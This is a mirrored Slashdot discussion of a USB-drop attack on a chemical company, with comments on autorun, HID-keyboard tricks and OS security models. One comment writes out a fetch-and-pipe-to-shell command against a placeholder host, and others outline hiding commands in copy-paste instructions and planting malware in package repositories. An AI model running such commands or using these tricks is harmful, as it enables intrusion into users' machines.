Slashdot Mirror
Criminals Distribute Infected USB Sticks In Parking Lot
New submitter sabri writes "The Dutch news-site Elsevier is reporting that cybercriminals attempted to steal data from a multinational chemicals company by 'losing' spyware-infected USB sticks on the company's parking lot. Their attempt failed as one of the employees who found the stick dropped it off at the company's IT department, who then found the spyware and issued a warning. So next time, don't expect to find someone's dirty pictures on a USB stick you just found..."
Sounds expensive just to distribute malware/viruses at say even a few bucks a stick compared to traditional methods like email which proven to be quite effective by the gullible. I just don't see this being common practice though it possible it could be a targeted attack in an attempt to penetrate the company specifically.
So you can load USB sticks you find and extract the pictures!
"Have you ever thought about just turning off the TV, sitting down with your kids, and hitting them?"
Or turn off auto-run in Windows. I once found a USB drive on the ground. Turns out it was some grad student's drive. I tried to return it but got no response from the email I found on his resume.
and laugh at the windows auto-loader files they tried to get you with.
Seriously, I found a "trick" USB stick in my work mailbox once, which turned out to be a test from our IT department that, if you loaded it (in Windows), would direct you to an obligatory computer security training program. After I called them about it, they let me keep it.
Why would you run an executable from a USB stick you found in a goddamn parking lot? Is this the same crowd who'd find a syringe and needle in the parking lot, and inject it in themselves just to see what happens?
Sometimes, people deserve what they get.
To plug an unknown into your computer in the first place? Good grief, there will never be a shortage of stupid.
dd if=/dev/zero of=/dev/[usbdrive]
voila, free thumb drive, malware free.
Nobodies Prefect
Tidbits for Techs Technology Blog
Seriously, how did this get past the fire-hose? This isn't a new idea, practice, or form of attack. It's actually many many years old (likely dating back to the days of floppy disks). Most company Security and/or IT policies state that you should bring found USB Drives to Security and/or IT, and expressly forbid just plugging them into a company computer on the company network. I have no idea how anyone at Slashdot would have found this remotely news-worthy.
This technique is discussed in "Metasploit - The penetration testers guide" ( http://shop.oreilly.com/product/9781593272883.do )
Excellent book by the way. After reading it, you'll never look at computer security the same way again, and may very well just switch to an Abacus with a box of crayons on top.
There are some people that if they don't know, you can't tell 'em.
How many times did this work and we DONT hear about it, in cases where people did NOT take it to their IT department?
I want to delete my account but Slashdot doesn't allow it.
Actually, that's exactly what industrial spies should put on there if they were smart.
I would use a Linux live cd... No real threat of infection since it would probably target windows anyway. For added security, unplug the power to the hard drives.
This is a time-honored way of targeting a particular company. It sounds expensive, but if your motivation is commercial or governmental *coughcoughstux* it's extremely cheap compared to the alternatives (bribery, breaking-and-entering, rubber-hose cryptography). It's also a great way of finding out whether your own organization is aware of malware trouble; this technique is commonly used as part of security audits performed by companies hired to find out how good your company really is.
A company I worked for a few years ago hired a security auditing firm to check up on ourselves (only a few people were told, and we were told to keep quiet to ensure that our day-to-day practices were tested, not our "crap, someone's checking!" performance). They were unable to penetrate the network from the outside (including wirelessly) or socially engineer their way past reception or weasel out a password, but they got in via the USB-stick-in-the-parking-lot method. They told us afterwards that this is an extremely effective technique, as primate curiosity is almost unstoppable.
Everybody gets what the majority deserves.
...if it's one of those shaped like red kissing lips, has a little piece of lingerie wrapped around it, a little bit of perfume, and does indeed have some dirty pictures on there (seemingly amateur pictures taken with a phone). Chances are a lot of colleagues will want to have a look to see if they "recognize somebody".
Idiots. Both of them.
Contrary to the popular belief, there indeed is no God.
So a coworker found a usb key in the parking lot and wisely didn't plug it in. Instead he asked me to check it out before he did. So dutifully I fired up my live CD, plugged it in and quickly saw it belonged to a coworker. But which one in a company of 300+? Well, that was actually pretty easy to figure out, since there was a nice folder with pictures of himself naked in a mirror. Many of them. All alone. So I gave the guy the USB key, told him what I'd seen, washed my hands (and disinfected my cubicle) and was sooooo glad when the photographer took a different job.
So there may be a virus, or maybe just a lonely coworker.
Be Excellent To Each Other
Wouldn't it be more productive to give them away? As in brand them with the name of a product, and literally give them away at a place where they employees visit. I think someone would be much more likely to use a USB given to them at a "legitimate" event, than one found on the ground.
Don't forget to AVOID USING "-t vfat" as an option to mkfs, or else you MAY be able to use it SOMEWHERE BESIDES Linux.
There, fixed that for you
Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
I didn't know Yoda changes his name to Anne and was writing news articles these days
dude you are fuckin' boring !
get Ethanol-fueled unbanned please !
If you think Linux has a magical immunity you might want to read how to write a Linux virus in 5 easy steps which shows with just a little social engineering its really not hard to target Linux just as the malware writers target Windows and OSX now.
From the article you mention:
A step that could be taken by the Gnome and KDE developers: Require launchers to have execute permissions. A saved attachment won't have those. Therefore, even though a syntactically correct and properly named launcher was dropped on the desktop a user can't just click on it and start it if the execute bit is not set.
Done. Modern versions of KDE need launcher to have execute permission. That hole is patched.
And nobody pretends that Linux has some magically imunity to viruses. As a Unix-like OS it just follows a few key principles :
- don't blindly execute everything. require executable to be explicitely marked as such (thus any shit downloaded from the web or from e-mail won't automatically be launchable).
- don't run constantly as root. thus the amount of harm that a program can do is limited to the access rights of a user. (While this still makes it possible to send spam, mine the data of the user, and modify the user profile, at least it prevents further deeper compromising of the running system).
That doesn't magically solve all malware problems in the universe. But at least it makes the life of malware writer a little bit more complicated. And the 5-step virus relies on a work-around of the first rule. Which has been since then corrected.
Back then, this no-brainer principles were NOT followed by Windows XP, making it even easier to write worms spreading over e-mail. Thankfully, since then Vista has arrived and has brought UAC dialogs in these situations (now how much dialogs can help security problems when the users are used to "okay" click on everything, that remains to be seen).
Or did you think android runs on Windows?
Android is a completely different beast and instead of unix-like userland it uses it's very own userland (a Java-like system).
Though it too doesn't allow execution of arbitrary e-mail attachment too. It's not impossible to write android malware, even malware that finds a way to look legitimate to android's capability system.
But at least the scenario "Here are some pics of hot lesbian teens! Click on the attachment to view them!" doesn't work on modern OSes. Except windows (and that's until WinXP, starting from Vista, you get an UAC dialog telling you that you run an executable from an untrusted source - now how many idiots will click on "okay" anyway is a different story).
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
Didn't occur to you to go to his house, pick the locks, and leave the drive on his night stand? Because that would have been AWESOME!
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Any security-minded organization would indoctrinate their employees, and set policy (either via OS security and/or SOP) to use only secured USB keys, which are provided. This should be a no-brainer, and shouldn't cost a significant amount.
This kind of policy limit the scope of these kind of attacks, as well as helps to prevent inadvertent info-leaks like when workers lose their wallet/backpack. By preventing stupidity and bad luck you greatly improve the company security.
Make sure everyone's vote counts: Verified Voting
Social Engineering at its finest and most simplest. Much more effective getting your payload unto a system using this method then say then using a dancing baby gif.
---- GENERATION 26: The first time you see this, copy it into your sig on any forum and add 1 to the generation.
The trouble with USB is that you don't know. Let's say you plug in that "thumb drive". Perhaps it turns out to be a "keyboard" that issues whatever the shortcut is for executing a command and sends something like:
wget -q -O - http://naughty.com/ | sh
All sorts of things could happen when you plug in a USB stick. Perhaps not too much of a worry in practice for Joe Schmo as doing it effectively would probably require a level of sophistication that would make it not worth while for a vague target but Linux does not magically make USB sticks safe.
Boffoonery - downloadable Comedy Benefit for Bletchley Park
The autorun feature of Windows (mainly XP and to a much lesser extend Vista/7) is a textbook example of where trading convenience for security can turn out to be a VERY BAD IDEA.
Autorun functionality pisses me off anyway. I always turn that shit off mainly because yes, if I put in a DVD or a USB flash it's likely I'm going to be wanting to use it soon, but since Autorun is going to invariable pop up some Explorer window or DVD application all of a sudden once the media has been analysed, that very action of a new window popping up without my direct instantiation of it is damn annoying.
Saving the couple of clicks to perform the same effect of whatever Autorun does is really, really not worth the mess we've gotten ourselves into (and still do).
Most people on Slashdot are fucking idiots.
The 'cyber criminals planted the usb sticks in an attempt to steal data'... stuff doesn't come from investigation, it comes from speculation. It could simply have been an infected USB stick an employee threw away or dropped.
DSM is really a boring chemicals business, employing tens of thousands of people. The chances of spyware getting past anti virus software and onto the right persons computer is pretty damn slim.
So it looks more like projection to me. There's a lot of talk about cybercriminals as part of the 'cyberwar' budget requests. This was a lost USB key infected. IT dept projects the cyberwar onto their company and assumes it was a cyberattack and not some piece of crapware. Cyberwar lobby grabs the story and pumps it up for their own agenda.
I found a RAM stick once in a parking lot, I plugged it in and found nothing, or so I thought, a directory listing was empty and a anti-virus scan returned a clean bill of health. A few days later my friend told me that he was receiving emails from me. After investigation it was determined that a Linux on windows was running, with a SMTP server and a mail client was sending many emails. Is that possible? I asked about the reason for the SMTP server, I was told it was in case my ISP was blocking or throttling SMTP traffic through their server.
TOP DSLR Cameras Reviews of the top DSLRs
+ dns poisoning
+ arp poisoning
+ infected windows box on same LAN
+ back doored router (google: cisco routers back doors spooks law enforcement - for an example of one company)
+ compromised BIOS and/or PCI/AGP hardware devices which survive wipes
the rootkit scanners (rkhunter, chkrootkit, and a few others) for Linux flat out SUCK. If you google for linux shells, back doors, etc. there are many, and many can be exploited through a 0day application exploit and by other means. The more packages on your system, the more possible holes to slide in through.
chkrootkit has an option to show you the 'strings' of binaries. while this is useful, it is useless to the majority of linux newbies who know nothing about reverse engineering and determining what 'strings' may be good or may be bad. when they raise this point on the net, people reply with messages like, "Just download from signed repos", "Verify the check-sum", and other advice which are good but against an APT threat, where a system may be targeted in many ways and is held in a persistent poisoned state (have you read about RF attacks? packet radio drivers and your ethernet card and/or sound card (sound modem), the attacks are infinite. Even attacks using image formats with modified data can factor in and exploit your system.
the hardware attacks get even worse, even when it comes to splice attacks on wired networks (for those who know wireless/bluetooth is for dumbshits and use a wired network).
keypresses (passwords!) can be yanked from next door or apartment/condo rooms around you even if you use wired keyboards. keypresses can be yanked via power line analysis and smart meters may make this even easier!
traffic analysis (predictive behavior) in order to poison the right way the right time even through encryption.
nothing is secure, not even an unplugged, never networked locally or remote system. satellite attacks should also be factored in.
tin foil? only if you're an idiot or one of THEM.
Plug in, dd with zeros, fdisk, mkfs.ext2, profit?
Unless you are on windows where you plug in and automatically get infected...
Just because you issue a warning doesn't mean your end users will heed it. I've learned that all too well in regard to WhitePages. We tell our employees to not use it, yet they do so anyways. Then they bitch when we're replacing their systems due to a rogue AV suite. So even if IT issues a general warning to not plug in the drive... some brain dead end user will do so anyways. It only takes one.
Are they free? Mail me one!
I collect viruses,
"ViRuS PaRK"
-- Shut up Pinky, I've been waiting around to take over the world since the punch card days
* ORIGIN: hmm
The company should have disabled USB ports on all company computers anyway. Inconvenient, yes, but necessary in this day and age.
Doesn't address the newly popular (due to continuing stupid expense reductions) of BYOD where of course USB ports will remain open, but as BYOD is a security nightmare anyway...
blindly antisocialist = antisocial
This is so old and has happened so many times before that some organisations have had time to develop, test and deploy so-called "data gateways" - machines that you can put your USB sticks, DVDs and other media into, that will scan them for infection and safely transfer the files you select to your network share.
Assorted stuff I do sometimes: Lemuria.org
That's why operating system kernels that are writing by clueful coders validate DMA commands from target Firewire devices.
I've done a whole lot of Firewire storage firmware, mostly for Wiebetech. The way Firewire drives work is that the Initiator - your PC - transmits SCSI Command Descriptor Blocks - CDBs - the Target - the disk - via the Serial Bus Protocol 2 - SBP-2. (There was an SBP protocol at first but it was withdrawn for some reason).
After that the Initiator sits quietly by until the Target informs the initiator that the CDB has been processed.
I think they designed it this way in part because Targets have limited processing capacity, so allowing the Target to drive the protocol also allows it to control the rate at which work is performed. But you're also trusting your Target to deliver the file the user just double-clicked, rather than overwriting the buffer cache entries that contain /etc/shadow.
One of the very best hacks ever at the MacHack conference was that some guy wrote a FireWire applicaiton that would display an animation of a fire burning in a brick fireplace on the screen of any other Macintoh is was connected to.
The Mac whose screen would show that heart-warming image did not have any extra software installed on it at all. Instead the Mac with the Hack installed would DMA it directly into the other Mac's video memory!
Michael David Crawford, who is available for storage, embedded systems and driver consulting.
A bulk purchase of low capacity but nice looking keydrives could easily be less than $1 a pop... for that sort of money I could see a mass (snail)mailing of malware being quite feasible...
Targeted advertising data could be used to select young, affluent, non-techical types, perhaps package the drive as a free trial version of a music/movie download service even have a slick looking website with the 'viewing' software there as a free download.
I wonder how many time they succeeded silently before they got busted and stopped because (nobody laugh) a "warning" was issued.
And the Security Kabuki goes on.
If you were blocking sigs, you wouldn't have to read this.
I find it odd: the amount of mental gymnastics you go through to prove linux to be better.
We're not speaking about malware-on-a-stick as reported by TFA.
I'm just answering the current thread of discussion, in which the conversation has drifted toward the usual debate of Unix-like OSes vs. Windows regarding design and security.
(in short: all modern (=anything dating back from Unix) OSes (except Windows) are reputed to be slightly more secure due to their design: namely they don't run thing which aren't tagged as being runnable in the first place, they don't run with admin privilege. This doesn't solve all problems, but at least makes these systems less likely to be target of the "Click on attachment to see nude pictures!" type of malware.
Parent poster pointed back to a 3 year old article trying to prove that it's possible to build such type of malware.
I did just explain that this article is built around an oversight in desktop environment which was fixed since then in the affect systems, so the initial claim, "sane OS design = less susceptible to clickable malware in attachment" still applies)
In short, in the last few post we were speaking about a different type of malware than the one of TFA.
In case of a rogue USB stick, the virus wouldn't be downloaded. It would already be on a fs with execute bit set.
Well, for that to work, it would require that the FS *has* an execute bit to set.
The usual filesystem found on USB stick (FAT) doesn't have one. Nor does the other typical choices found on amovible media (exFAT, NTFS, UDF).
And I have to check, but it's quite possible that hot plugged device, aren't mounted with the "exec" attribute with but "noexec" attribute. (My distro does indeed do so). Thus for filesystem which aren't declared in the fstab, they aren't trusted enough by default to run anything.
So, in order to have a working USB stick as a malware carrier, one need: .ZIP file (or more likely a .tar file, to get the mode-bits packed with it)
- to format with an unusual format (ext, btrfs, etc. Or using a layer above FAT & UDF like TRANS.TBL)
- set the execute (and maybe the suid or dev, might be useful depending on what they want to snoop/steal) bits on the file system
- either hope that the hot-plug service isn't configured to use the "noexec,nosuid,nodev" combo by default.
- or find a way around that:
-- like store the hack inside a
-- along with instruction not to double click on it (which will open the TAR with the desktop environment VFS plugin - no executable at all here), but instead drag-drop the content of the TAR to your home before opening it (where the execute bit will be honored*)
-- hope that the guy will open the pictures by clicking on them (and won't instead use some "slide-show" command right-clicking the directory)
At that point of complexity, it's easier to go the "Smartphone malware" route, and play by the Linux book:
- design a closed source application.
- with some interesting feature (MP3 Youtube downloader!!!)
- hide your malware payload inside the package
- submit your package to some closed source repository which doesn't check that closely the details of submitted applications.
- if the repository is popular enough, people will start downloading the software and installing it.
Now all the dirty complicated parts (making sure that the correct stuff is marked as executable, etc.) is automatically handled by the package manager (as it should on any modern linux distro).
"all" you need is "just" some social engineering:
- to convince the repository manager to include your package (easier with smaller less known repositories).
- to convince the end user to notice your 3rd party application, add the repository and install your malware. (easier with big known 3rd party repositories).
*: That's the only situation where the security model of Windows (version >= Vista) is slightly
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
- Set-up a wiki somewhere.
- Create a page with a tasty title
(How to rip lesbian porn videos from flash powered site!!!!)
- Hide command in a big wall of commands that have to be copy-pasted to a shell.
- With some clever page formatting, make so that the line seems invisible when displayed in a web-browser, but still gets copied when the big wall of commands is selected, copied and pasted into a shell. (You know like this old trick where the user is asked to copy-past a password into a web form. But the input field is actually ta "file input" field in the web form, the password is actually a much longer string (the full path of an important file to steal) but only a few letter are visible the rest is invisible due to weird formatting, and the form is autosubmitted by javascript).
Clueless users will execute your script en mass.
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
1) Penetration testers have been using this attack for some time, surprisingly often it works, it only takes one clueless manager to plug it in.
2) With a little creative reengineering one does not need to rely on the system to automount and autorun the stick, instead one sticks a USB hub in there and a HID emulator and pumps out keystrokes, pretty much all operating systems will automatically initialize it as a keyboard device. Also one can hide that function until go time. let them act as ordinary memory sticks 'till then.
And I thought the anthrax scare was back... Oh, well, read on.
1. Don't, under any circumstances, mount it
2. Format it
3. Enjoy your new USB stick
If a given computer had a card-reader whose hardware or immutable firmware guaranteed read-only behavior when the lock tab was set, that would meet the r/o requirements as well, but only with respect to this particular computer and other computers with the same feature.
It would basically be the same situation floppy disks were always in: Most 1980s floppy drives enforced the read-only tab in hardware, the host computer couldn't override it. But it was possible to build or modify a floppy drive so the read-only tab was ignored.
As a customer, I would PREFER a computer where any writeable long-term-memory had a physical way of locking it into read-only mode that could not be defeated in software. This could be a jumper setting, a lock/unlock tab, a push-button, or whatever. "long-term-memory" included hard drives, writable USB/firewire/etc. devices, SATA and IDE devices, and even the computer BIOS code and that part of the BIOS data that doesn't need to change all the time (i.e. the clock and certain other status bits would not be protected from change). Those last two I would keep "read-only" 24/7 except when I was making changes.
Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
Comment removed based on user account deletion
Except they used CDs to infect people's computers.
http://www.acetonestudio.com
Reading, parsing and displaying some information like icons from the connected drive can be expoited too. This shouldn't be news anyone following security trends and having read about stuxnet for example.
There are many things that still just happen automatically once you plug in removable drive to windows systems. Unfortunately it's also true that macs have similar weaknesses and more and more linux distros too as they try to make systems more 'user friendly' .
I got you beat. Years ago we used a build of Windows NT that didn't recognize USB ports. Security problem solved. (yes we had the ports, we just couldn't use them. I recall having to install a SCSI card just so I could use a scanner... good times.)
Of course criminals could just leave some 3.5 floppy's laying around in the parking lot... not quite the sexy draw I would bet...
I went down to the employment office to get some assistance finding work. There I used a USB stick to record some stuff off one of their PC's. When I came home and looked at the USB on my linux box I found a . (dot) hidden directory I did not create. I searched online and found the files within were related to a PC virus. I emailed the office and told them exactly how I got the virus. A week later I went to the office again and used a different PC. I popped the USB into my linux laptop and there it was again. I went to the secretary and told them this was unacceptable and that they were propigating viruses to their clients.
I also dislike operating systems that randomly add . (dot) hidden directories to my USB. For example apple products seem to do this. I think they add files in order to improve access to the contents or add images or something. Every time I stick my USB stick into someones Mac, I have to go through the directories it made automatically to verify that it didnt insert some malicious code.